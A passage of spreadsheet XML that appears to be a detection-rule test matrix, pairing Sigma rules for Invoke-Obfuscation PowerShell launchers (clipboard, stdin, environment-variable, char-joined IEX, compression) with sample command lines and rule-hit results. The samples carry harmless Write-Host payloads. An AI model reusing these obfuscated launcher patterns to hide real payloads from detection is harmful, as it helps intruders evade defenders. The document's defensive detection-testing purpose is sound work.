          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1092" s="44" t="inlineStr">
        <is>
          <t>cmd /"r" "echo Write-Host 'Bypass' | clip &amp;&amp; powershell.exe -nop -c \" $c='cl'+'ipboard]::'; iex([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F1092" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1092" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1092" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1092" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip (e1561947-b4e3-4a74-9bdd-83baed21bdb5); Invoke-Obfuscation Via Use Clip (e1561947-b4e3-4a74-9bdd-83baed21bdb5)</t>
        </is>
      </c>
      <c r="J1092" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1092" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1093" ht="15.75" customHeight="1" s="42">
      <c r="A1093" s="44" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B1093" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1093" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1093" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1093" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -Command "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1093" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1093" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1093" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1093" s="44" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1093" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1093" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1094" ht="15.75" customHeight="1" s="42">
      <c r="A1094" s="44" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B1094" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1094" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1094" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1094" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NOproFilE -COmManD "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1094" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1094" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1094" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1094" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1094" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1094" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1095" ht="15.75" customHeight="1" s="42">
      <c r="A1095" s="44" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B1095" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1095" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1095" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1095" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nopRofilE -CoMmaNd "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1095" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1095" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1095" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1095" s="44" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1095" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1095" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1096" ht="15.75" customHeight="1" s="42">
      <c r="A1096" s="44" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B1096" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1096" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1096" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1096" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nOpROfile -CoMMand "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1096" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1096" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1096" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1096" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1096" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1096" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1097" ht="15.75" customHeight="1" s="42">
      <c r="A1097" s="44" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B1097" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1097" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1097" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1097" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nop -cOmMand "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1097" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1097" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1097" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1097" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1097" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1097" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1098" ht="15.75" customHeight="1" s="42">
      <c r="A1098" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B1098" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1098" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1098" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1098" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nop -COMmanD "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1098" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1098" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1098" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1098" s="44" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1098" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1098" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1099" ht="15.75" customHeight="1" s="42">
      <c r="A1099" s="43" t="n"/>
      <c r="B1099" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline</t>
        </is>
      </c>
      <c r="C1099" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Obfuscated IEX Invocation</t>
        </is>
      </c>
      <c r="D1099" s="44" t="inlineStr">
        <is>
          <t>4bf943c6-5146-4273-98dd-e958fd1e3abf</t>
        </is>
      </c>
      <c r="E1099" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; ([string]::Join('', ([char]73, [char]69, [char]88))) 'Write-Host Educational_Test'"</t>
        </is>
      </c>
      <c r="F1099" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1099" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1099" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1099" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J1099" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1099" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1100" ht="15.75" customHeight="1" s="42">
      <c r="A1100" s="43" t="n"/>
      <c r="B1100" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline</t>
        </is>
      </c>
      <c r="C1100" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Obfuscated IEX Invocation</t>
        </is>
      </c>
      <c r="D1100" s="44" t="inlineStr">
        <is>
          <t>4bf943c6-5146-4273-98dd-e958fd1e3abf</t>
        </is>
      </c>
      <c r="E1100" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -C "&amp; ([string]::Join('', ([char]73, [char]69, [char]88))) 'Write-Host Educational_Test'"</t>
        </is>
      </c>
      <c r="F1100" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1100" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1100" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1100" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J1100" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1100" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1101" ht="15.75" customHeight="1" s="42">
      <c r="A1101" s="43" t="n"/>
      <c r="B1101" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline</t>
        </is>
      </c>
      <c r="C1101" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Obfuscated IEX Invocation</t>
        </is>
      </c>
      <c r="D1101" s="44" t="inlineStr">
        <is>
          <t>4bf943c6-5146-4273-98dd-e958fd1e3abf</t>
        </is>
      </c>
      <c r="E1101" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; ([string]::Join('', ([char]73, [char]69, [char]88))) 'Write-Host Educational_Test'"</t>
        </is>
      </c>
      <c r="F1101" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1101" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1101" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1101" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J1101" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1101" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1102" ht="15.75" customHeight="1" s="42">
      <c r="A1102" s="43" t="n"/>
      <c r="B1102" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C1102" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D1102" s="44" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1102" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "echo Write-Host 'Bypass' | powershell.exe -noprofile -command -"</t>
        </is>
      </c>
      <c r="F1102" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1102" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1102" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1102" s="43" t="n"/>
      <c r="J1102" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1102" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1103" ht="15.75" customHeight="1" s="42">
      <c r="A1103" s="43" t="n"/>
      <c r="B1103" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C1103" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D1103" s="44" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1103" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "echo Write-Host 'Bypass' | powershell.exe -noprofile -command -"</t>
        </is>
      </c>
      <c r="F1103" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1103" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1103" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1103" s="43" t="n"/>
      <c r="J1103" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1103" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1104" ht="15.75" customHeight="1" s="42">
      <c r="A1104" s="43" t="n"/>
      <c r="B1104" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C1104" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D1104" s="44" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1104" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "echo Write-Host 'Bypass' | pwsh.exe -noexit -"</t>
        </is>
      </c>
      <c r="F1104" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1104" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1104" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1104" s="43" t="n"/>
      <c r="J1104" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1104" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1105" ht="15.75" customHeight="1" s="42">
      <c r="A1105" s="43" t="n"/>
      <c r="B1105" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C1105" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D1105" s="44" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1105" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "echo Write-Host 'Bypass' | pwsh.exe -noexit -"</t>
        </is>
      </c>
      <c r="F1105" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1105" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1105" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1105" s="44" t="n"/>
      <c r="J1105" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1105" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1106" ht="15.75" customHeight="1" s="42">
      <c r="A1106" s="43" t="n"/>
      <c r="B1106" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C1106" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D1106" s="44" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1106" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "echo 'Write-Host Bypass' | powershell.exe -noexit -"</t>
        </is>
      </c>
      <c r="F1106" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1106" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1106" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1106" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher (6c96fc76-0eb1-11eb-adc1-0242ac120002)</t>
        </is>
      </c>
      <c r="J1106" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1106" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1107" ht="15.75" customHeight="1" s="42">
      <c r="A1107" s="43" t="n"/>
      <c r="B1107" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C1107" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D1107" s="44" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1107" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -C "echo 'Write-Host Bypass' | powershell.exe -noexit -"</t>
        </is>
      </c>
      <c r="F1107" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1107" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1107" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1107" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher (6c96fc76-0eb1-11eb-adc1-0242ac120002)</t>
        </is>
      </c>
      <c r="J1107" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1107" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1108" ht="15.75" customHeight="1" s="42">
      <c r="A1108" s="43" t="n"/>
      <c r="B1108" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C1108" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D1108" s="44" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1108" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "echo 'Write-Host Bypass' | powershell.exe -noexit -"</t>
        </is>
      </c>
      <c r="F1108" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1108" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1108" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1108" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher (6c96fc76-0eb1-11eb-adc1-0242ac120002)</t>
        </is>
      </c>
      <c r="J1108" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1108" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1109" ht="15.75" customHeight="1" s="42">
      <c r="A1109" s="43" t="n"/>
      <c r="B1109" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C1109" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D1109" s="44" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E1109" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$env:TEST_VAR = 'Write-Output ''Execution Simulated'''; Invoke-Expression $env:TEST_VAR"</t>
        </is>
      </c>
      <c r="F1109" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1109" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1109" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1109" s="43" t="n"/>
      <c r="J1109" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1109" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1110" ht="15.75" customHeight="1" s="42">
      <c r="A1110" s="43" t="n"/>
      <c r="B1110" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C1110" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D1110" s="44" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E1110" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMaND "$env:TEST_VAR = 'Write-Output ''Execution Simulated'''; Invoke-Expression $env:TEST_VAR"</t>
        </is>
      </c>
      <c r="F1110" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1110" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1110" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1110" s="43" t="n"/>
      <c r="J1110" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1110" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1111" ht="15.75" customHeight="1" s="42">
      <c r="A1111" s="43" t="n"/>
      <c r="B1111" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C1111" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D1111" s="44" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E1111" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommAnD "$env:TEST_VAR = 'Write-Output ''Execution Simulated'''; Invoke-Expression $env:TEST_VAR"</t>
        </is>
      </c>
      <c r="F1111" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1111" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1111" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1111" s="43" t="n"/>
      <c r="J1111" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1111" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1112" ht="15.75" customHeight="1" s="42">
      <c r="A1112" s="43" t="n"/>
      <c r="B1112" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C1112" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D1112" s="44" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E1112" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$env:TEST_VAR = 'Write-Output ''Execution Simulated'''; Invoke-Expression $env:TEST_VAR"</t>
        </is>
      </c>
      <c r="F1112" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1112" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1112" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1112" s="43" t="n"/>
      <c r="J1112" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1112" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1113" ht="15.75" customHeight="1" s="42">
      <c r="A1113" s="43" t="n"/>
      <c r="B1113" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C1113" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D1113" s="44" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E1113" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMaNd "$env:TEST_VAR = 'Write-Output ''Execution Simulated'''; Invoke-Expression $env:TEST_VAR"</t>
        </is>
      </c>
      <c r="F1113" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1113" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1113" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1113" s="43" t="n"/>
      <c r="J1113" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1113" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1114" ht="15.75" customHeight="1" s="42">
      <c r="A1114" s="43" t="n"/>
      <c r="B1114" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C1114" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D1114" s="44" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E1114" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmanD "$env:TEST_VAR = 'Write-Output ''Execution Simulated'''; Invoke-Expression $env:TEST_VAR"</t>
        </is>
      </c>
      <c r="F1114" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1114" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1114" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1114" s="43" t="n"/>
      <c r="J1114" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1114" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1115" ht="15.75" customHeight="1" s="42">
      <c r="A1115" s="43" t="n"/>
      <c r="B1115" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C1115" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D1115" s="44" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E1115" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMmANd "$env:TEST_VAR = 'Write-Output ''Execution Simulated'''; Invoke-Expression $env:TEST_VAR"</t>
        </is>
      </c>
      <c r="F1115" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1115" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1115" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1115" s="43" t="n"/>
      <c r="J1115" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1115" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1116" ht="15.75" customHeight="1" s="42">
      <c r="A1116" s="43" t="n"/>
      <c r="B1116" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C1116" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D1116" s="44" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E1116" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$d = N`ew-Object System.IO.Compression.DeflateStream($s, 0); $r = N`ew-Object System.IO.StreamReader($d, [System.T`ext.Encoding]::ASCII); $r.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F1116" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1116" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1116" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1116" s="43" t="n"/>
      <c r="J1116" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1116" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1117" ht="15.75" customHeight="1" s="42">
      <c r="A1117" s="43" t="n"/>
      <c r="B1117" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C1117" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
